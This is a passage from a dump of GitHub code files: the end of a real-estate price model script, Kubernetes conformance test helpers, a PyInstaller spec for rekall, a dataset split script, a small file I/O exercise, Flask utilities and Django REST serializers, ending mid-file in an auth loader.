SQUARE FEET','GROSS SQUARE FEET','YEAR BUILT','TAX CLASS AT TIME OF SALE','SALE PRICE']\ndf[col]\n\n\n# ## Describe Categorical Data\n\n# In[791]:\n\n\n# define the categorical frame before describing it (it was previously undefined)\ndf_categorical = df.select_dtypes(include=['object'])\ndf_categorical.describe()\n\n\n# In[792]:\n\n\ndf['BOROUGH'].unique()\n\n\n# In[793]:\n\n\ndf['BOROUGH'].hist()\n\n\n# In[794]:\n\n\ndf['TAX CLASS AT PRESENT'].unique()\n\n\n# In[795]:\n\n\ndf['TAX CLASS AT PRESENT'].hist()\n\n\n# In[796]:\n\n\n# TAX CLASS AT PRESENT\npivot1 = df.groupby(\"TAX CLASS AT PRESENT\")['SALE PRICE'].median()\npivot1\n\n\n# In[797]:\n\n\npivot1.plot(kind='bar', color='b')\n\n\n# 
In[798]:\n\n\n# TAX CLASS AT TIME OF SALE\ndf['TAX CLASS AT TIME OF SALE'].unique()\n\n\n# In[799]:\n\n\npivot2 = df.groupby('TAX CLASS AT TIME OF SALE')['SALE PRICE'].median()\npivot2\n\n\n# In[800]:\n\n\npivot2.plot(kind='bar', color='r')\n\n\n# In[801]:\n\n\n#BOROUGH\ndf['BOROUGH'].unique()\n\n\n# In[802]:\n\n\npivot3_1 = df.groupby('BOROUGH')['SALE PRICE'].median()\npivot3_1\n\n\n# In[803]:\n\n\npivot3_1.plot(kind='bar', color='g')\n\n\n# In[804]:\n\n\npivot3_2=df.groupby('ZIP CODE')['SALE PRICE'].median()\npivot3_2\n\n\n# In[805]:\n\n\npivot3_2.plot(kind='area',color='green')\n\n\n# In[806]:\n\n\n#BUILDING CLASS CATEGORY\nprint(df['BUILDING CLASS CATEGORY'].nunique())\n\n\n# In[807]:\n\n\npivot4 = df.groupby('BUILDING CLASS CATEGORY')['SALE PRICE'].median()\npivot4\n\n\n# In[808]:\n\n\nplt.figure(figsize=(6,6))\npivot4.plot(kind='bar', color='Green')\n\n\n# # **Optimized Model Preparation**\n\n# ## One-Hot Encoding\n\n# In[809]:\n\n\n#Features to be one-hot encoded\none_hot_features = ['BOROUGH', 'ZIP CODE','BUILDING CLASS CATEGORY','TAX CLASS AT PRESENT','TAX CLASS AT TIME OF SALE']\n#Converting categorical variables into indicator variables\none_hot_encoded = pd.get_dummies(df[one_hot_features])\none_hot_encoded.info(verbose=True, memory_usage=True, null_counts=True)\n\n\n# In[810]:\n\n\n# Replacing categorical columns with dummies\nfdf = df.drop(one_hot_features,axis=1)\nfdf = pd.concat([fdf, one_hot_encoded] ,axis=1)\nfdf.info()\n\n\n# ## Correlation Matrix\n\n# In[811]:\n\n\ncorrelation_matrix_numerical=df[col].corr(method='pearson')\ncorrelation_matrix_numerical\n\n\n# In[665]:\n\n\ncorrelation_matrix_categorical=fdf.corr(method='pearson')\ncorrelation_matrix_categorical\n\n\n# ## Numeric Features Heatmap\n\n# In[812]:\n\n\nplt.subplots(figsize = (12,10))\nsns.heatmap(correlation_matrix_numerical)\n\n\n# # **Optimized Models**\n\n# ## Data Preview\n\n# In[814]:\n\n\ndf=fdf\n\n\n# In[815]:\n\n\ndf.shape\n\n\n# In[816]:\n\n\ndf.info()\n\n\n# ## Create Dataset\n\n# In[817]:\n\n\ndf_temp = df.sample(n=int(df.shape[0]*0.1), random_state=1)\n# Create dataset\nX, y = df_temp.drop(['SALE PRICE', 'SALE DATE'], axis=1), df_temp['SALE PRICE']\n\n\n# ## Random Forest\n\n# In[818]:\n\n\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import make_scorer\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import cross_validate\n\n\n# In[819]:\n\n\n#define MAPE function to calculate mean absolute percentage error\nimport numpy as np\ndef MAPE(true, pred):\n diff = np.abs(np.array(true) - np.array(pred))\n return np.mean(diff / true)\n\n\n# In[820]:\n\n\nrf_regressor = RandomForestRegressor(min_samples_leaf=10)\nscores_rf = cross_validate(rf_regressor, X, y, cv=10,\n scoring=make_scorer(MAPE),\n return_train_score=True)\n\n\n# In[821]:\n\n\nprint('The mape result for random forest is {}'.format(np.min(scores_rf['test_score'])))\n\n\n# ## Adaboost\n\n# In[675]:\n\n\nfrom sklearn.ensemble import AdaBoostRegressor\n\n\n# In[676]:\n\n\nregr = AdaBoostRegressor(random_state=0, n_estimators=500)\nscores_adaboost = cross_validate(regr, X, y, cv=5,\n scoring=make_scorer(MAPE),\n return_train_score=True)\n\n\n# In[677]:\n\n\nprint('The best score for Adaboost is {}'.format(np.min(scores_adaboost['test_score'])))\n\n\n# ## Lightgbm\n\n# In[678]:\n\n\nimport lightgbm as lgb\nfrom lightgbm import LGBMRegressor\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, 
random_state=42)\n\ngbm = lgb.LGBMRegressor(num_leaves=1000,\n                        learning_rate=0.01,\n                        n_estimators=300)\ngbm.fit(X_train, y_train,\n        eval_set=[(X_test, y_test)],\n        eval_metric='l1',\n        early_stopping_rounds=100)\n\nprint('Starting predicting...')\n# predict\ny_pred = gbm.predict(X_test, num_iteration=gbm.best_iteration_)\n# eval\nprint('The mape of prediction is:', MAPE(y_test, y_pred))\n\n\n# ## XGBoost\n\n# ### Build MAE & MAPE Functions\n\n# In[679]:\n\n\nimport numpy as np\nimport xgboost as xgb  # must be imported here: the xgb.DMatrix annotations below are evaluated at definition time\ndef xgboost_MAE(pred, dtrain: xgb.DMatrix):\n    true = dtrain.get_label()\n    diff = np.abs(np.array(true) - np.array(pred))\n    return 'mae', float(np.mean(diff))\n\ndef xgboost__MAPE(pred, dtrain: xgb.DMatrix):\n    true = dtrain.get_label()\n    diff = np.abs(np.array(true) - np.array(pred))\n    return 'mape', float(np.exp(np.mean(diff))-1)\n    \n\n\n# ### Calculate MAE of Original Price\n\n# In[849]:\n\n\nimport xgboost as xgb\nfrom sklearn.metrics import mean_absolute_error\nclf = xgb.XGBRegressor(learning_rate=0.04,\n                       n_estimators=600,\n                       max_depth=5, colsample_bylevel=0.9)\n\n\n# In[850]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nclf.fit(X_train, y_train,\n        eval_set=[(X_train, y_train), (X_test, y_test)],\n        eval_metric=xgboost_MAE,\n        verbose=True )\n\nprint('Starting predicting...')\n# predict\ny_pred = clf.predict(X_test)\n# eval\nmae = mean_absolute_error(y_test, y_pred)\nprint('The MAE of predictions on the original sales price is:',mae)\n\n\n# ### Calculate MAE on Log Price (MAPE on Original Price)\n\n# In[851]:\n\n\nX_train, X_test, ylg_train, ylg_test = train_test_split(X, np.log(y), test_size=0.2, random_state=42)\nclf.fit(X_train, ylg_train,\n        eval_set=[(X_train, ylg_train), (X_test, ylg_test)],\n        eval_metric=xgboost__MAPE,\n        verbose=True )\n\nprint('Starting predicting...')\n# predict\nylg_pred = clf.predict(X_test)\n# eval\nmae_logpx = mean_absolute_error(ylg_test, ylg_pred)\nprint('The MAE on log prices is:',mae_logpx)\n\n\n# # **Conclusion**\n\n# We tried four models on the real estate sales price dataset. After cleaning, the dataset contains more than 40k records with around 300 features. Measures taken to gain better performance include tuning parameters, passing in customized evaluation functions, and taking the log of the original price. \n# \n# The best performance achieved by our models is around an MAE of 70k dollars and a MAPE of 0.25. \n
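# \n# Added sanity check on the log-price metric: if the mean absolute error on log(price) is d, the implied typical relative error on the original price is exp(d) - 1, which is exactly what xgboost__MAPE reports. For an illustrative d = 0.22 this gives exp(0.22) - 1 = 0.246, i.e. roughly the 25% MAPE quoted above (0.22 is a made-up value, not a measured result). \n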
","repo_name":"vickeywangvw/Real-Estate-Price-Prediction","sub_path":"Real Estate Price Prediction (Optimized).py","file_name":"Real Estate Price Prediction (Optimized).py","file_ext":"py","file_size_in_byte":10749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"42894692693","text":"from azure.core.exceptions import HttpResponseError\nfrom msrest import Serializer\nimport pytest\nimport time\nimport json\n\nfrom kubernetes import client\nfrom common.kubernetes_crd_utility import watch_crd_instance\nfrom common.kubernetes_pod_utility import (\n    watch_pod_status,\n    get_pod_logs,\n    get_pod_logs_since_seconds,\n)\nfrom common.kubernetes_configmap_utility import get_namespaced_configmap\nfrom common.kubernetes_configuration_utility import show_kubernetes_configuration\nfrom common.kubernetes_secret_utility import watch_kubernetes_secret\nfrom common.kubernetes_namespace_utility import watch_namespace\nfrom common.results_utility import append_result_output\n\n\n# This function checks the status of the namespaces of the kubernetes cluster. The namespaces to be monitored are passed in as a list.\ndef check_namespace_status(outfile=None, namespace_list=None, timeout=300):\n    namespace_dict = {}\n    for namespace in namespace_list:\n        namespace_dict[namespace] = 0\n    append_result_output(\"Namespace dict: {}\\n\".format(namespace_dict), outfile)\n    print(\"Generated the namespace dictionary.\")\n\n    # The callback function to check the namespace status\n    def namespace_event_callback(event):\n        try:\n            append_result_output(\"{}\\n\".format(event), outfile)\n            namespace_name = event[\"raw_object\"].get(\"metadata\").get(\"name\")\n            namespace_status = event[\"raw_object\"].get(\"status\")\n            if not namespace_status:\n                return False\n            if namespace_status.get(\"phase\") == \"Active\":\n                namespace_dict[namespace_name] = 1\n            if all(ele == 1 for ele in list(namespace_dict.values())):\n                return True\n            return False\n        except Exception as e:\n            pytest.fail(\"Error occurred while processing the namespace event: \" + str(e))\n\n    # Checking the namespace status\n    api_instance = client.CoreV1Api()\n    watch_namespace(api_instance, timeout, namespace_event_callback)\n\n\n# This function checks the status of pods in a given namespace. The pods to be monitored are identified using the pod label list parameter.\ndef check_kubernetes_pods_status(\n    pod_namespace, outfile=None, pod_label_list=None, timeout=300\n):\n    pod_label_dict = {}\n    if (\n        pod_label_list\n    ):  # This parameter is a list of label values to identify the pods that we want to monitor in the given namespace\n        for pod_label in pod_label_list:\n            pod_label_dict[pod_label] = 0\n        append_result_output(\"Pod label dict: {}\\n\".format(pod_label_dict), outfile)\n    print(\"Generated the pods dictionary.\")\n\n    # The callback function to check if the pod is in running state\n    def pod_event_callback(event):\n        try:\n            append_result_output(\"{}\\n\".format(event), outfile)\n            pod_status = event[\"raw_object\"].get(\"status\")\n            pod_metadata = event[\"raw_object\"].get(\"metadata\")\n            pod_metadata_labels = pod_metadata.get(\"labels\")\n            if not pod_metadata_labels:\n                return False\n\n            pod_metadata_label_values = (\n                pod_metadata_labels.values()\n            )  # It contains the list of all label values for the pod whose event was called.\n            current_label_value = None  # This label value will be common in pod event and label list provided and will be monitored\n            for label_value in pod_metadata_label_values:\n                if label_value in pod_label_dict:\n                    current_label_value = label_value\n            if not current_label_value:\n                return False\n\n            if pod_status.get(\"containerStatuses\"):\n                for container in pod_status.get(\"containerStatuses\"):\n                    if container.get(\"restartCount\") > 0:\n                        pytest.fail(\n                            \"The pod {} was restarted. Please see the pod logs for more info.\".format(\n                                container.get(\"name\")\n                            )\n                        )\n                    if not container.get(\"state\").get(\"running\"):\n                        pod_label_dict[current_label_value] = 0\n                        return False\n                    else:\n                        pod_label_dict[current_label_value] = 1\n            if all(ele == 1 for ele in list(pod_label_dict.values())):\n                return True\n            return False\n        except Exception as e:\n            pytest.fail(\"Error occurred while processing the pod event: \" + str(e))\n\n    # Checking status of all pods\n    if pod_label_dict:\n        api_instance = client.CoreV1Api()\n        watch_pod_status(api_instance, pod_namespace, timeout, pod_event_callback)
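\n\n\n# Added usage sketch for the pod checker (illustrative only -- the namespace and label values below are hypothetical, not taken from this test suite):\n#\n#   check_kubernetes_pods_status(\n#       \"azure-arc\",\n#       outfile=None,\n#       pod_label_list=[\"flux\", \"fluent-bit\"],\n#       timeout=300,\n#   )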
\n\n\n# Function to check if the crd instance status has been updated with the status fields mentioned in the 'status_dict' parameter\ndef check_kubernetes_crd_status(\n    crd_group,\n    crd_version,\n    crd_namespace,\n    crd_plural,\n    crd_name,\n    status_dict={},\n    outfile=None,\n    timeout=300,\n):\n    # The callback function to check if the crd event received has been updated with the status fields\n    def crd_event_callback(event):\n        try:\n            append_result_output(\"{}\\n\".format(event), outfile)\n            crd_status = event[\"raw_object\"].get(\"status\")\n            if not crd_status:\n                return False\n            for status_field in status_dict:\n                if not crd_status.get(status_field):\n                    return False\n                if crd_status.get(status_field) != status_dict.get(status_field):\n                    pytest.fail(\n                        \"The CRD instance status has been updated with incorrect value for '{}' field.\".format(\n                            status_field\n                        )\n                    )\n            return True\n        except Exception as e:\n            pytest.fail(\"Error occurred while processing crd event: \" + str(e))\n\n    # Checking if CRD instance has been updated with status fields\n    api_instance = client.CustomObjectsApi()\n    watch_crd_instance(\n        api_instance,\n        crd_group,\n        crd_version,\n        crd_namespace,\n        crd_plural,\n        crd_name,\n        timeout,\n        crd_event_callback,\n    )
\n\n\n# Function to monitor the pod logs. It will ensure that all logs passed in the 'logs_list' parameter are present in the container logs.\ndef check_kubernetes_pod_logs(\n    pod_namespace,\n    pod_name,\n    container_name,\n    logs_list=None,\n    error_logs_list=None,\n    outfile=None,\n    timeout_seconds=300,\n):\n    logs_dict = {}\n    for log in logs_list:\n        logs_dict[log] = 0\n    print(\"Generated the logs dictionary.\")\n\n    # The callback function to examine the pod log\n    def pod_log_check(logs):\n        try:\n            for error_log in error_logs_list:\n                if error_log in logs:\n                    pytest.fail(\"Error log found: \" + logs)\n            for log in logs_dict:\n                if log in logs:\n                    logs_dict[log] = 1\n            if all(ele == 1 for ele in list(logs_dict.values())):\n                return True\n            return False\n        except Exception as e:\n            pytest.fail(\"Error occurred while processing pod log event: \" + str(e))\n\n    # Checking the pod logs\n    api_instance = client.CoreV1Api()\n    pod_logs = get_pod_logs(api_instance, pod_namespace, pod_name, container_name)\n    if not pod_log_check(pod_logs):\n        timeout = time.time() + timeout_seconds\n        while True:\n            time.sleep(60)\n            pod_logs_since_interval = get_pod_logs_since_seconds(\n                api_instance, pod_namespace, pod_name, container_name, 90\n            )\n            if pod_log_check(pod_logs_since_interval):\n                break\n            if time.time() > timeout:\n                pytest.fail(\"The watch on the pod logs has timed out.\")\n\n\n# Function to check the compliance state of the kubernetes configuration\ndef check_kubernetes_configuration_state(\n    kc_client,\n    resource_group,\n    cluster_rp,\n    cluster_type,\n    cluster_name,\n    configuration_name,\n    outfile=None,\n    timeout_seconds=300,\n):\n    timeout = time.time() + timeout_seconds\n    while True:\n        get_kc_response = show_kubernetes_configuration(\n            kc_client,\n            resource_group,\n            cluster_rp,\n            cluster_type,\n            cluster_name,\n            configuration_name,\n        )\n        append_result_output('GET config response: {}\\n'.format(Serializer().serialize_data(get_kc_response, 'FluxConfiguration', keep_readonly=True)), outfile)\n        provisioning_state = get_kc_response.provisioning_state\n        compliance_state = get_kc_response.compliance_state or \"Unknown\"\n        if provisioning_state == \"Succeeded\" and compliance_state == \"Compliant\":\n            break\n        if provisioning_state == \"Failed\" or provisioning_state == \"Cancelled\":\n            error_message = \"ERROR: The kubernetes configuration creation finished with terminal provisioning state {}. \".format(\n                provisioning_state\n            )\n            append_result_output(error_message, outfile)\n            pytest.fail(error_message)\n        if time.time() > timeout:\n            error_message = \"ERROR: Timeout. The kubernetes configuration is in {} provisioning state and {} compliance state.\".format(\n                provisioning_state, compliance_state\n            )\n            append_result_output(error_message, outfile)\n            pytest.fail(error_message)\n        time.sleep(10)\n\n\ndef check_kubernetes_configuration_delete_state(\n    kc_client,\n    resource_group,\n    cluster_rp,\n    cluster_type,\n    cluster_name,\n    configuration_name,\n    outfile=None,\n    timeout_seconds=300,\n):\n    timeout = time.time() + timeout_seconds\n    while True:\n        try:\n            get_kc_response = kc_client.get(\n                resource_group,\n                cluster_rp,\n                cluster_type,\n                cluster_name,\n                configuration_name,\n            )\n            provisioning_state = get_kc_response.provisioning_state\n            append_result_output(\n                \"Kubernetes Configuration still exists with Provisioning State: {}\\n\".format(\n                    provisioning_state\n                ),\n                outfile,\n            )\n        except HttpResponseError as e:\n            if e.status_code == 404:\n                append_result_output(\n                    \"Kubernetes Configuration {} successfully deleted\\n\".format(\n                        configuration_name\n                    ),\n                    outfile,\n                )\n                break\n        if time.time() > timeout:\n            pytest.fail(\n                \"ERROR: Timeout. The kubernetes configuration is in {} provisioning state.\".format(\n                    provisioning_state\n                )\n            )\n        time.sleep(10)\n\n\n# Function to monitor the kubernetes secret. It will determine if the secret has been successfully created.\ndef check_kubernetes_secret(secret_namespace, secret_name, timeout=300):\n    # The callback function to check if the secret event received has secret data\n    def secret_event_callback(event):\n        try:\n            secret_data = event[\"raw_object\"].get(\"data\")\n            if not secret_data:\n                return False\n            return True\n        except Exception as e:\n            pytest.fail(\"Error occurred while processing secret event: \" + str(e))\n\n    # Checking the kubernetes secret\n    api_instance = client.CoreV1Api()\n    watch_kubernetes_secret(\n        api_instance, secret_namespace, secret_name, timeout, secret_event_callback\n    )\n\n\ndef get_azure_arc_agent_version(api_instance, namespace, configmap_name):\n    configmap = get_namespaced_configmap(api_instance, namespace, configmap_name)\n    azure_arc_agent_version = configmap.data.get(\"AZURE_ARC_AGENT_VERSION\")\n    if not azure_arc_agent_version:\n        pytest.fail(\n            \"The azure arc configmap does not contain the azure arc agent version.\"\n        )\n    return azure_arc_agent_version\n","repo_name":"isabella232/microsoft-flux-conformance","sub_path":"src/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":12113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"9901417767","text":"# -*- mode: python -*-\nimport os\nimport sys\nimport distorm3\n\na = Analysis(\n    ['tools/installers/rekal.py'],\n    hiddenimports=[],\n    hookspath=None,\n    runtime_hooks=None)\n\npyz = PYZ(a.pure)\n\nexe = EXE(\n    pyz,\n    a.scripts,\n    exclude_binaries=True,\n    name='rekal',\n    debug=False,\n    strip=True,\n    upx=True,\n    console=True)\n\n# The yara installer is dumb and puts the lib in dumb places. I have given up
\n# trying to guess where it'll end up after we pip install it.\nLIBYARA = None\nfor dirpath, _, files in os.walk(sys.prefix):\n    if \"yara.so\" in files:\n        LIBYARA = os.path.join(dirpath, \"yara.so\")\n        break\n\nif LIBYARA is None:\n    raise RuntimeError(\"Could not find yara.so.\")\n\n\nLIBDISTORM3 = os.path.join(distorm3.__path__[0], \"libdistorm3.so\")\n\ncoll = COLLECT(\n    exe,\n    a.binaries + [\n        (\"libdistorm3.so\", LIBDISTORM3, \"BINARY\"),\n        (\"lib/yara.so\", LIBYARA, \"BINARY\"),\n    ],\n    a.zipfiles,\n    a.datas,\n    strip=None,\n    upx=True,\n    name='rekal')\n","repo_name":"Labs22/BlackServerOS","sub_path":"Digital Forensics/rekall-1.6.0/rekall-1.6.0/tools/installers/darwin.spec","file_name":"darwin.spec","file_ext":"spec","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"5"}
+{"seq_id":"27456546065","text":"from glob import glob\r\nimport os\r\nimport random\r\nimport numpy as np\r\n\r\nrandom.seed(45)\r\n\r\nDATASET = 'Patch_SVM_32_60'\r\nPATH_DICT = {}\r\nPATH_DICT_ = {}\r\n\r\n\r\ndataset_groups = [os.path.split(group)[-1] for group in glob(DATASET+'/*')]\r\nfor grp in dataset_groups:\r\n\tPATH_DICT[grp] = []\r\n#path_list = [path for path in ]\r\n#print(PATH_DICT)\r\nfor path in glob(DATASET+'/*/*'):\r\n\tfor grp in dataset_groups:\r\n\t\tif grp in path:\r\n\t\t\tPATH_DICT[grp].append(path)\r\n\t\t\r\n\r\nfor div in [\"training\", \"test\", \"validation\"]:\r\n\tPATH_DICT_[div] = {}\r\n\tfor grp in dataset_groups:\r\n\t\tgrp_lst = PATH_DICT[grp]\r\n\t\trandom.shuffle(grp_lst)\r\n\r\n\t\ttrain_no = int(len(grp_lst)*0.7)\r\n\t\ttest_no = int(len(grp_lst)*0.9)\r\n\t\t#val_no = int(len(grp_lst)*0.1)\r\n
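\t\t# Added note: train_no and test_no are cumulative cut points, so the slicing below yields a ~70/20/10 split -- indices [0, 0.7N) go to training, [0.7N, 0.9N) to test and [0.9N, N) to validation.\r\n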
\t\tif div == \"training\":\r\n\t\t\tPATH_DICT_[div][grp] = grp_lst[:train_no]\r\n\t\telif div == \"test\":\r\n\t\t\tPATH_DICT_[div][grp] = grp_lst[train_no:test_no]\r\n\t\telif div == \"validation\":\r\n\t\t\tPATH_DICT_[div][grp] = grp_lst[test_no:]\r\n\r\n\r\nos.system(\"mkdir training test validation\")\r\n\r\n\r\nfor div in [\"training\", \"test\", \"validation\"]:\r\n\tfor grp in PATH_DICT:\r\n\t\tp = os.path.join(div,grp)\r\n\t\tos.system(\"mkdir \"+p)\r\n\r\nfor split in PATH_DICT_:\r\n\tfor grp in PATH_DICT_[split]:\r\n\t\tp = os.path.join(split,grp)\r\n\t\tfor img in PATH_DICT_[split][grp]:\r\n\t\t\tos.system('cp '+img+' '+p)\r\n","repo_name":"Beeseey/Thesis_A_DEEP_LEARNING_BASED_INTEGRATED_RETRIEVAL_SYSTEM-FOR_MEDICAL_IMAGES","sub_path":"PBIR/data_split.py","file_name":"data_split.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
+{"seq_id":"14079273002","text":"#arquivo_txt.py\n\nimport sys\n\n#file opening modes:\n#'r' = read only\n#'w' = write\n#'a' = append\n\nlista=[]\n\ndef entrada():\n    fruta=input('Name of the fruit to add:')\n    lista.append(fruta)\n    print(fruta + ' added to the list')\n\ndef mostrar():\n    print('lista=',lista)\n\ndef gravar():\n    arquivo = open('frutas.txt','w') #write mode\n    for fruta in lista:\n        arquivo.write(fruta + '\\n')\n\n    arquivo.close()\n    print('Data saved successfully')\n\ndef ler():\n    # read mode: print the saved list back (assumes gravar() has written frutas.txt before)\n    arquivo = open('frutas.txt','r')\n    for linha in arquivo:\n        print(linha.strip())\n    arquivo.close()\n\ndef anexar():\n    # append mode: add one more fruit to the end of the file\n    fruta = input('Name of the fruit to append:')\n    arquivo = open('frutas.txt','a')\n    arquivo.write(fruta + '\\n')\n    arquivo.close()\n    print('Data appended successfully')\n\ndef menu():\n    print('\\n\\n######################')\n    print('## List control ##')\n    print('1 = input data')\n    print('2 = show data')\n    print('3 = save data')\n    print('4 = read data')\n    print('5 = append data')\n    opcao=int(input('Which option?'))\n\n    if(opcao==1):\n        entrada()\n    elif(opcao==2):\n        mostrar()\n    elif(opcao==3):\n        gravar()\n    elif(opcao==4):\n        ler()\n    elif(opcao==5):\n        anexar()\n    else:\n        print('Invalid option!')\n\n\n\nif(__name__=='__main__'):\n    while True: #infinite loop\n        menu()\n    \n","repo_name":"GusSimoes/python","sub_path":"arquivo_txt.py","file_name":"arquivo_txt.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"1534328883","text":"__author__ = 'Chris Bandy'\n\nfrom datetime import datetime, timedelta\nfrom functools import wraps\nfrom flask import g, url_for, flash, abort, request, redirect\n\nTIMEDELTA_UNITS = (\n    ('year', 3600 * 24 * 365),\n    ('month', 3600 * 24 * 30),\n    ('week', 3600 * 24 * 7),\n    ('day', 3600 * 24),\n    ('hour', 3600),\n    ('minute', 60),\n    ('second', 1)\n    )\n\n\ndef requires_login(f):\n    @wraps(f)\n    def decorated_function(*args, **kwargs):\n        if g.user is None:\n            flash(u'You need to be signed in for this page.')\n            return redirect(url_for('general.login', next=request.path))\n        return f(*args, **kwargs)\n\n    return decorated_function\n\n\ndef requires_admin(f):\n    @wraps(f)\n    def decorated_function(*args, **kwargs):\n        if not g.user.is_admin:\n            abort(401)\n        return f(*args, **kwargs)\n\n    return requires_login(decorated_function)\n\n\ndef format_datetime(dt):\n    return dt.strftime('%Y-%m-%d @ %H:%M')\n\n\ndef format_timedelta(delta, granularity='second', threshold=.85):\n    if isinstance(delta, datetime):\n        delta = datetime.utcnow() - delta\n    if isinstance(delta, timedelta):\n        seconds = int((delta.days * 86400) + delta.seconds)\n    else:\n        seconds = delta\n\n    for unit, secs_per_unit in TIMEDELTA_UNITS:\n        value = abs(seconds) / secs_per_unit\n        if value >= threshold or unit == granularity:\n            if unit == granularity and value > 0:\n                value = max(1, value)\n            value = int(round(value))\n            rv = u'%s %s' % (value, unit)\n            if value != 1:\n                rv += u's'\n            return rv\n    return u''\n\ndef enum(**enums):\n    return type('Enum', (object,), enums)","repo_name":"bandycj/SwaRoute","sub_path":"swa_route/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
+{"seq_id":"37427951047","text":"from rest_framework import serializers\n\nfrom airplanes.models import AirplaneType, Airplane\n\n\nclass AirplaneTypeSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = AirplaneType\n        fields = (\"id\", \"name\")\n\n\nclass AirplaneSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Airplane\n        fields = (\"id\", \"name\", \"rows\", \"seats_in_row\", \"airplane_type\")\n\n\nclass AirplaneDetailSerializer(AirplaneSerializer):\n    airplane_type = AirplaneTypeSerializer(many=False, read_only=True)\n\n    class Meta:\n        model = Airplane\n        fields = (\n            \"id\",\n            \"name\",\n            \"image\",\n            \"rows\",\n            \"seats_in_row\",\n            \"airplane_type\",\n            \"capacity\",\n        )\n\n\nclass AirplaneListSerializer(AirplaneSerializer):\n    airplane_type = serializers.SlugRelatedField(\n        many=False, read_only=True, slug_field=\"name\"\n    )\n\n\nclass AirplaneImageSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Airplane\n        fields = (\"id\", \"image\")\n","repo_name":"Paul-Starodub/Airport-API-Service","sub_path":"airplanes/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"34511337284","text":"from .iml_auth_loader import 
IMLProjectScopedAuthLoader, AuthenticationError\nfrom ...layer import queue\nfrom ...loader.layer_loader import (\n TileLayerLoader,\n parse_exception_obj,\n ChainInterrupt,\n InitUploadLayerController,\n UploadLayerController,\n LiveTileLayerLoader,\n LoadLayerController,\n EditSyncController,\n)\nfrom ...network.net_handler import NetworkResponse, NetworkError\nfrom ...common.signal import make_fun_args\n\n\nclass IMLAuthExtension:\n MAX_RETRY_COUNT = 1\n\n def __init__(self, network, *a, **kw):\n # setup retry with reauth\n self._reset_retry_cnt()\n self.con_auth = IMLProjectScopedAuthLoader(network)\n self.con_auth.signal.results.connect(make_fun_args(self._after_retry_with_auth))\n self.con_auth.signal.error.connect(self._handle_auth_error)\n\n def _handle_auth_error(self, err):\n chain_err = parse_exception_obj(err)\n if isinstance(chain_err, ChainInterrupt):\n e, idx = chain_err.args[0:2]\n else:\n e = chain_err\n self._release() # release active dispatch\n self.signal.error.emit(AuthenticationError(e))\n\n def _handle_error(self, err):\n\n chain_err = parse_exception_obj(err)\n if isinstance(chain_err, ChainInterrupt):\n e, idx = chain_err.args[0:2]\n else:\n e = chain_err\n if isinstance(e, NetworkError): # retry only when network error, not timeout\n response = e.get_response()\n status = response.get_status()\n reply = response.get_reply()\n if status in (401, 403):\n if self._retry_cnt < self.MAX_RETRY_COUNT:\n self._retry_with_auth(reply)\n return\n else:\n self._retry(reply)\n return\n # otherwise emit error\n self._release() # release active dispatch\n self.signal.error.emit(err)\n\n def _reset_retry_cnt(self):\n self._retry_cnt = 0\n\n def _retry_with_auth(self, reply):\n self._retry_cnt += 1\n # retried params\n self.params_queue.retry_params()\n # try to reauth, then continue run loop\n self.con_auth.start(self.get_conn_info())\n\n def _after_retry_with_auth(self, conn_info=None):\n self._run_loop()\n\n def _refresh_loader(self, network, loader: LoadLayerController):\n self._reset_retry_cnt()\n conn_info = network.apply_connected_conn_info(loader.get_conn_info())\n\n def _save_conn_info_to_layer(self, loader: LoadLayerController):\n loader.layer.update_conn_info(loader.get_conn_info())\n\n\nclass IMLTileLayerLoader(IMLAuthExtension, TileLayerLoader):\n def __init__(self, network, *a, **kw):\n TileLayerLoader.__init__(self, network, *a, **kw)\n IMLAuthExtension.__init__(self, network, *a, **kw)\n self.params_queue = queue.SimpleRetryQueue(key=\"tile_id\")\n self.network = network\n\n def _start(self, **kw):\n self._refresh_loader(self.network, self)\n super()._start(**kw)\n\n def post_render(self, *a, **kw):\n super().post_render(*a, **kw)\n self._save_conn_info_to_layer(self)\n\n\nclass IMLLiveTileLayerLoader(IMLTileLayerLoader, LiveTileLayerLoader):\n def __init__(self, network, *a, **kw):\n # LiveTileLayerLoader init is same as TileLayerLoader, thus redundant here\n IMLTileLayerLoader.__init__(self, network, *a, **kw)\n\n\nclass IMLLayerLoader(IMLAuthExtension, LoadLayerController):\n def __init__(self, network, *a, **kw):\n LoadLayerController.__init__(self, network, *a, **kw)\n IMLAuthExtension.__init__(self, network, *a, **kw)\n self.network = network\n\n def _start(self, **kw):\n self._refresh_loader(self.network, self)\n super()._start(**kw)\n\n def post_render(self, *a, **kw):\n super().post_render(*a, **kw)\n self._save_conn_info_to_layer(self)\n\n def _retry_with_auth(self, reply):\n # retried params\n keys = [\"limit\", \"handle\"]\n params = dict(zip(keys, 
